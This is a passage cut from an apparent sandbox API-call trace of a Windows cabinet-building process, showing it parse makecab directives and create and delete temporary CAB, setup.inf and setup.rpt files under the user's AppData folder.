returned -9 [0254.783] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="UniqueFiles") returned -18 [0254.783] _strcmpi (_Str1="CompressionType", _Str2="UniqueFiles") returned -18 [0254.783] _strcmpi (_Str1="CompressionLevel", _Str2="UniqueFiles") returned -18 [0254.783] _strcmpi (_Str1="CompressionMemory", _Str2="UniqueFiles") returned -18 [0254.783] _strcmpi (_Str1="DestinationDir", _Str2="UniqueFiles") returned -17 [0254.783] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="UniqueFiles") returned -17 [0254.783] _strcmpi (_Str1="DiskLabelTemplate", _Str2="UniqueFiles") returned -17 [0254.783] _strcmpi (_Str1="DoNotCopyFiles", _Str2="UniqueFiles") returned -17 [0254.783] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="UniqueFiles") returned -15 [0254.783] _strcmpi (_Str1="FolderSizeThreshold", _Str2="UniqueFiles") returned -15 [0254.783] _strcmpi (_Str1="GenerateInf", _Str2="UniqueFiles") returned -14 [0254.783] _strcmpi (_Str1="InfCabinetHeader", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfCommentString", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfDateFormat", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfDiskHeader", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfDiskLineFormat", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFileHeader", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFileLineFormat", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFileName", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFooter", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFooter1", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFooter2", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFooter3", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfFooter4", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader1", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader2", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader3", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader4", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader5", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfHeader6", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="InfSectionOrder", _Str2="UniqueFiles") returned -12 [0254.783] _strcmpi (_Str1="MaxCabinetSize", _Str2="UniqueFiles") returned -8 [0254.783] _strcmpi (_Str1="MaxDiskFileCount", _Str2="UniqueFiles") returned -8 [0254.783] _strcmpi (_Str1="MaxDiskSize", _Str2="UniqueFiles") returned -8 [0254.783] _strcmpi (_Str1="MaxErrors", _Str2="UniqueFiles") returned -8 [0254.783] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="UniqueFiles") returned -3 [0254.783] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="UniqueFiles") returned -3 [0254.783] _strcmpi (_Str1="ReservePerFolderSize", _Str2="UniqueFiles") returned -3 [0254.783] _strcmpi (_Str1="RptFileName", _Str2="UniqueFiles") returned -3 [0254.783] _strcmpi (_Str1="SourceDir", _Str2="UniqueFiles") returned -2 [0254.783] _strcmpi (_Str1="UniqueFiles", _Str2="UniqueFiles") returned 0 [0254.783] atoi (_Str="1") returned 1 [0254.784] _strcmpi (_Str1="Cabinet", _Str2="Infattr") returned -6 [0254.784] atoi (_Str="1") returned 1 [0254.784] _vsnprintf (in: _DstBuf=0x27e87fb250, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fb1b8 | out: _DstBuf="Infattr") returned 7 [0254.784] atoi (_Str="1") returned 1 [0254.784] atoi (_Str="1") returned 1 [0254.784] _vsnprintf (in: _DstBuf=0x27e87fb250, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fb1b8 | out: _DstBuf="Infdate") returned 7 [0254.784] atoi (_Str="1") returned 1 [0254.784] atoi (_Str="1") returned 1 [0254.784] _vsnprintf (in: _DstBuf=0x27e87fb250, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fb1b8 | out: _DstBuf="Inftime") returned 7 [0254.784] atoi (_Str="1") returned 1 [0254.784] _close (_FileHandle=3) returned 0 [0254.785] GetCurrentProcessId () returned 0x200 [0254.785] _vsnprintf (in: _DstBuf=0x27e87ff150, _MaxCount=0xff, _Format="CAB%5.5d.TMP", _ArgList=0x27e87ff138 | out: _DstBuf="CAB00512.TMP") returned 12 [0254.785] _open (_FileName="CAB00512.TMP" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\cab00512.tmp"), _OpenFlag=1282) returned 3 [0254.785] _close (_FileHandle=3) returned 0 [0254.802] _unlink (_FileName="CAB00512.TMP") returned 0 [0254.803] _open (_FileName="setup.inf" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\setup.inf"), _OpenFlag=258) returned 3 [0254.804] _close (_FileHandle=3) returned 0 [0254.804] _unlink (_FileName="setup.inf") returned 0 [0254.804] _strcmpi (_Str1="Cabinet", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="CabinetNameTemplate", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="ChecksumWidth", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="ClusterSize", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="Compress", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="LongSourceFileNames", _Str2="RptFileName") returned -6 [0254.804] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="RptFileName") returned -15 [0254.804] _strcmpi (_Str1="CompressionType", _Str2="RptFileName") returned -15 [0254.805] _strcmpi (_Str1="CompressionLevel", _Str2="RptFileName") returned -15 [0254.805] _strcmpi (_Str1="CompressionMemory", _Str2="RptFileName") returned -15 [0254.805] _strcmpi (_Str1="DestinationDir", _Str2="RptFileName") returned -14 [0254.805] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="RptFileName") returned -14 [0254.805] _strcmpi (_Str1="DiskLabelTemplate", _Str2="RptFileName") returned -14 [0254.805] _strcmpi (_Str1="DoNotCopyFiles", _Str2="RptFileName") returned -14 [0254.805] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="RptFileName") returned -12 [0254.805] _strcmpi (_Str1="FolderSizeThreshold", _Str2="RptFileName") returned -12 [0254.805] _strcmpi (_Str1="GenerateInf", _Str2="RptFileName") returned -11 [0254.805] _strcmpi (_Str1="InfCabinetHeader", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfCommentString", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfDateFormat", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfDiskHeader", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfDiskLineFormat", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFileHeader", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFileLineFormat", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFileName", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFooter", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFooter1", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFooter2", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFooter3", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfFooter4", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader1", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader2", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader3", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader4", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader5", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfHeader6", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="InfSectionOrder", _Str2="RptFileName") returned -9 [0254.805] _strcmpi (_Str1="MaxCabinetSize", _Str2="RptFileName") returned -5 [0254.805] _strcmpi (_Str1="MaxDiskFileCount", _Str2="RptFileName") returned -5 [0254.805] _strcmpi (_Str1="MaxDiskSize", _Str2="RptFileName") returned -5 [0254.805] _strcmpi (_Str1="MaxErrors", _Str2="RptFileName") returned -5 [0254.805] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="RptFileName") returned -11 [0254.805] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="RptFileName") returned -11 [0254.806] _strcmpi (_Str1="ReservePerFolderSize", _Str2="RptFileName") returned -11 [0254.806] _strcmpi (_Str1="RptFileName", _Str2="RptFileName") returned 0 [0254.806] GetCurrentProcessId () returned 0x200 [0254.806] _vsnprintf (in: _DstBuf=0x27e87ff150, _MaxCount=0xff, _Format="CAB%5.5d.TMP", _ArgList=0x27e87ff138 | out: _DstBuf="CAB00512.TMP") returned 12 [0254.806] _open (_FileName="CAB00512.TMP" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\cab00512.tmp"), _OpenFlag=1282) returned 3 [0254.808] _close (_FileHandle=3) returned 0 [0254.808] _unlink (_FileName="CAB00512.TMP") returned 0 [0254.808] _open (_FileName="setup.rpt" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\setup.rpt"), _OpenFlag=258) returned 3 [0254.809] _close (_FileHandle=3) returned 0 [0254.809] _unlink (_FileName="setup.rpt") returned 0 [0254.809] _strcmpi (_Str1="Cabinet", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="ClusterSize", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="Compress", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDiskLineFormat") returned 3 [0254.809] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDiskLineFormat") returned -6 [0254.809] _strcmpi (_Str1="CompressionType", _Str2="InfDiskLineFormat") returned -6 [0254.810] _strcmpi (_Str1="CompressionLevel", _Str2="InfDiskLineFormat") returned -6 [0254.810] _strcmpi (_Str1="CompressionMemory", _Str2="InfDiskLineFormat") returned -6 [0254.810] _strcmpi (_Str1="DestinationDir", _Str2="InfDiskLineFormat") returned -5 [0254.810] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDiskLineFormat") returned -5 [0254.810] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDiskLineFormat") returned -5 [0254.810] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDiskLineFormat") returned -5 [0254.810] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDiskLineFormat") returned -3 [0254.810] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDiskLineFormat") returned -3 [0254.810] _strcmpi (_Str1="GenerateInf", _Str2="InfDiskLineFormat") returned -2 [0254.810] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDiskLineFormat") returned -1 [0254.810] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDiskLineFormat") returned -1 [0254.810] _strcmpi (_Str1="InfCommentString", _Str2="InfDiskLineFormat") returned -1 [0254.810] _strcmpi (_Str1="InfDateFormat", _Str2="InfDiskLineFormat") returned -8 [0254.810] _strcmpi (_Str1="InfDiskHeader", _Str2="InfDiskLineFormat") returned -4 [0254.810] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfDiskLineFormat") returned 0 [0254.810] _strcmpi (_Str1="Cabinet", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="ChecksumWidth", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="ClusterSize", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="Compress", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infdisk#") returned 3 [0254.810] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="CompressionType", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="CompressionLevel", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="CompressionMemory", _Str2="Infdisk#") returned -6 [0254.810] _strcmpi (_Str1="DestinationDir", _Str2="Infdisk#") returned -5 [0254.810] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infdisk#") returned -5 [0254.810] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infdisk#") returned -5 [0254.810] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infdisk#") returned -5 [0254.810] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Infdisk#") returned -3 [0254.810] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Infdisk#") returned -3 [0254.810] _strcmpi (_Str1="GenerateInf", _Str2="Infdisk#") returned -2 [0254.810] _strcmpi (_Str1="InfCabinetHeader", _Str2="Infdisk#") returned -1 [0254.810] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Infdisk#") returned -1 [0254.810] _strcmpi (_Str1="InfCommentString", _Str2="Infdisk#") returned -1 [0254.810] _strcmpi (_Str1="InfDateFormat", _Str2="Infdisk#") returned -8 [0254.810] _strcmpi (_Str1="InfDiskHeader", _Str2="Infdisk#") returned 69 [0254.811] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Infdisk#") returned 73 [0254.811] _strcmpi (_Str1="InfFileHeader", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFileLineFormat", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFileName", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFooter", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFooter1", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFooter2", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFooter3", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfFooter4", _Str2="Infdisk#") returned 2 [0254.811] _strcmpi (_Str1="InfHeader", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfHeader1", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfHeader2", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfHeader3", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfHeader4", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfHeader5", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfHeader6", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="InfSectionOrder", _Str2="Infdisk#") returned 15 [0254.811] _strcmpi (_Str1="MaxCabinetSize", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="MaxDiskSize", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="MaxErrors", _Str2="Infdisk#") returned 4 [0254.811] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Infdisk#") returned 9 [0254.811] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Infdisk#") returned 9 [0254.811] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Infdisk#") returned 9 [0254.811] _strcmpi (_Str1="RptFileName", _Str2="Infdisk#") returned 9 [0254.811] _strcmpi (_Str1="SourceDir", _Str2="Infdisk#") returned 10 [0254.811] _strcmpi (_Str1="UniqueFiles", _Str2="Infdisk#") returned 12 [0254.811] _strcmpi (_Str1="DiskDirectory1", _Str2="Infdisk#") returned -5 [0254.811] _strcmpi (_Str1="CabinetName1", _Str2="Infdisk#") returned -6 [0254.811] atoi (_Str="1") returned 1 [0254.811] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infdisk#") returned 8 [0254.811] atoi (_Str="1") returned 1 [0254.811] _strcmpi (_Str1="disk#", _Str2="disk#") returned 0 [0254.811] _vsnprintf (in: _DstBuf=0x27e8c1af68, _MaxCount=0x1ff, _Format="%d", _ArgList=0x27e87fe328 | out: _DstBuf="1") returned 1 [0254.812] _strcmpi (_Str1="Cabinet", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="ChecksumWidth", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="ClusterSize", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="Compress", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="LongSourceFileNames", _Str2="Inflabel") returned 3 [0254.812] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="CompressionType", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="CompressionLevel", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="CompressionMemory", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="DestinationDir", _Str2="Inflabel") returned -5 [0254.812] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Inflabel") returned -5 [0254.812] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Inflabel") returned -5 [0254.812] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Inflabel") returned -5 [0254.812] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Inflabel") returned -3 [0254.812] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Inflabel") returned -3 [0254.812] _strcmpi (_Str1="GenerateInf", _Str2="Inflabel") returned -2 [0254.812] _strcmpi (_Str1="InfCabinetHeader", _Str2="Inflabel") returned -9 [0254.812] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Inflabel") returned -9 [0254.812] _strcmpi (_Str1="InfCommentString", _Str2="Inflabel") returned -9 [0254.812] _strcmpi (_Str1="InfDateFormat", _Str2="Inflabel") returned -8 [0254.812] _strcmpi (_Str1="InfDiskHeader", _Str2="Inflabel") returned -8 [0254.812] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Inflabel") returned -8 [0254.812] _strcmpi (_Str1="InfFileHeader", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFileLineFormat", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFileName", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFooter", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFooter1", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFooter2", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFooter3", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfFooter4", _Str2="Inflabel") returned -6 [0254.812] _strcmpi (_Str1="InfHeader", _Str2="Inflabel") returned -4 [0254.812] _strcmpi (_Str1="InfHeader1", _Str2="Inflabel") returned -4 [0254.812] _strcmpi (_Str1="InfHeader2", _Str2="Inflabel") returned -4 [0254.812] _strcmpi (_Str1="InfHeader3", _Str2="Inflabel") returned -4 [0254.812] _strcmpi (_Str1="InfHeader4", _Str2="Inflabel") returned -4 [0254.813] _strcmpi (_Str1="InfHeader5", _Str2="Inflabel") returned -4 [0254.813] _strcmpi (_Str1="InfHeader6", _Str2="Inflabel") returned -4 [0254.813] _strcmpi (_Str1="InfSectionOrder", _Str2="Inflabel") returned 7 [0254.813] _strcmpi (_Str1="MaxCabinetSize", _Str2="Inflabel") returned 4 [0254.813] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Inflabel") returned 4 [0254.813] _strcmpi (_Str1="MaxDiskSize", _Str2="Inflabel") returned 4 [0254.813] _strcmpi (_Str1="MaxErrors", _Str2="Inflabel") returned 4 [0254.813] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Inflabel") returned 9 [0254.813] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Inflabel") returned 9 [0254.813] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Inflabel") returned 9 [0254.813] _strcmpi (_Str1="RptFileName", _Str2="Inflabel") returned 9 [0254.813] _strcmpi (_Str1="SourceDir", _Str2="Inflabel") returned 10 [0254.813] _strcmpi (_Str1="UniqueFiles", _Str2="Inflabel") returned 12 [0254.813] _strcmpi (_Str1="DiskDirectory1", _Str2="Inflabel") returned -5 [0254.813] _strcmpi (_Str1="CabinetName1", _Str2="Inflabel") returned -6 [0254.813] atoi (_Str="1") returned 1 [0254.813] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Inflabel") returned 8 [0254.813] atoi (_Str="1") returned 1 [0254.813] _strcmpi (_Str1="disk#", _Str2="label") returned -8 [0254.813] _strcmpi (_Str1="label", _Str2="label") returned 0 [0254.813] _strcmpi (_Str1="Cabinet", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="ClusterSize", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="Compress", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCabinetLineFormat") returned 3 [0254.813] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="CompressionType", _Str2="InfCabinetLineFormat") returned -6 [0254.813] _strcmpi (_Str1="CompressionLevel", _Str2="InfCabinetLineFormat") returned -6 [0254.814] _strcmpi (_Str1="CompressionMemory", _Str2="InfCabinetLineFormat") returned -6 [0254.814] _strcmpi (_Str1="DestinationDir", _Str2="InfCabinetLineFormat") returned -5 [0254.814] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCabinetLineFormat") returned -5 [0254.814] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCabinetLineFormat") returned -5 [0254.814] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCabinetLineFormat") returned -5 [0254.814] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCabinetLineFormat") returned -3 [0254.814] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCabinetLineFormat") returned -3 [0254.814] _strcmpi (_Str1="GenerateInf", _Str2="InfCabinetLineFormat") returned -2 [0254.814] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfCabinetLineFormat") returned -4 [0254.814] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfCabinetLineFormat") returned 0 [0254.814] _strcmpi (_Str1="Cabinet", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="ChecksumWidth", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="ClusterSize", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="Compress", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="LongSourceFileNames", _Str2="Infcab#") returned 3 [0254.814] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="CompressionType", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="CompressionLevel", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="CompressionMemory", _Str2="Infcab#") returned -6 [0254.814] _strcmpi (_Str1="DestinationDir", _Str2="Infcab#") returned -5 [0254.814] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="Infcab#") returned -5 [0254.814] _strcmpi (_Str1="DiskLabelTemplate", _Str2="Infcab#") returned -5 [0254.814] _strcmpi (_Str1="DoNotCopyFiles", _Str2="Infcab#") returned -5 [0254.814] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="Infcab#") returned -3 [0254.814] _strcmpi (_Str1="FolderSizeThreshold", _Str2="Infcab#") returned -3 [0254.814] _strcmpi (_Str1="GenerateInf", _Str2="Infcab#") returned -2 [0254.814] _strcmpi (_Str1="InfCabinetHeader", _Str2="Infcab#") returned 70 [0254.814] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="Infcab#") returned 70 [0254.814] _strcmpi (_Str1="InfCommentString", _Str2="Infcab#") returned 14 [0254.814] _strcmpi (_Str1="InfDateFormat", _Str2="Infcab#") returned 1 [0254.814] _strcmpi (_Str1="InfDiskHeader", _Str2="Infcab#") returned 1 [0254.814] _strcmpi (_Str1="InfDiskLineFormat", _Str2="Infcab#") returned 1 [0254.814] _strcmpi (_Str1="InfFileHeader", _Str2="Infcab#") returned 3 [0254.814] _strcmpi (_Str1="InfFileLineFormat", _Str2="Infcab#") returned 3 [0254.814] _strcmpi (_Str1="InfFileName", _Str2="Infcab#") returned 3 [0254.814] _strcmpi (_Str1="InfFooter", _Str2="Infcab#") returned 3 [0254.815] _strcmpi (_Str1="InfFooter1", _Str2="Infcab#") returned 3 [0254.815] _strcmpi (_Str1="InfFooter2", _Str2="Infcab#") returned 3 [0254.815] _strcmpi (_Str1="InfFooter3", _Str2="Infcab#") returned 3 [0254.815] _strcmpi (_Str1="InfFooter4", _Str2="Infcab#") returned 3 [0254.815] _strcmpi (_Str1="InfHeader", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfHeader1", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfHeader2", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfHeader3", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfHeader4", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfHeader5", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfHeader6", _Str2="Infcab#") returned 5 [0254.815] _strcmpi (_Str1="InfSectionOrder", _Str2="Infcab#") returned 16 [0254.815] _strcmpi (_Str1="MaxCabinetSize", _Str2="Infcab#") returned 4 [0254.815] _strcmpi (_Str1="MaxDiskFileCount", _Str2="Infcab#") returned 4 [0254.815] _strcmpi (_Str1="MaxDiskSize", _Str2="Infcab#") returned 4 [0254.815] _strcmpi (_Str1="MaxErrors", _Str2="Infcab#") returned 4 [0254.815] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="Infcab#") returned 9 [0254.815] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="Infcab#") returned 9 [0254.815] _strcmpi (_Str1="ReservePerFolderSize", _Str2="Infcab#") returned 9 [0254.815] _strcmpi (_Str1="RptFileName", _Str2="Infcab#") returned 9 [0254.815] _strcmpi (_Str1="SourceDir", _Str2="Infcab#") returned 10 [0254.815] _strcmpi (_Str1="UniqueFiles", _Str2="Infcab#") returned 12 [0254.815] _strcmpi (_Str1="DiskDirectory1", _Str2="Infcab#") returned -5 [0254.815] _strcmpi (_Str1="CabinetName1", _Str2="Infcab#") returned -6 [0254.815] atoi (_Str="1") returned 1 [0254.815] _vsnprintf (in: _DstBuf=0x27e87fdda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fdd08 | out: _DstBuf="Infcab#") returned 7 [0254.815] atoi (_Str="1") returned 1 [0254.815] _strcmpi (_Str1="cab#", _Str2="cab#") returned 0 [0254.815] _vsnprintf (in: _DstBuf=0x27e8c1af68, _MaxCount=0x1ff, _Format="%d", _ArgList=0x27e87fe328 | out: _DstBuf="1") returned 1 [0254.815] _strcmpi (_Str1="Cabinet", _Str2="Infdisk#") returned -6 [0254.815] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Infdisk#") returned -6 [0254.815] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Infdisk#") returned -6 [0254.816] _strcmpi (_Str1="ChecksumWidth", 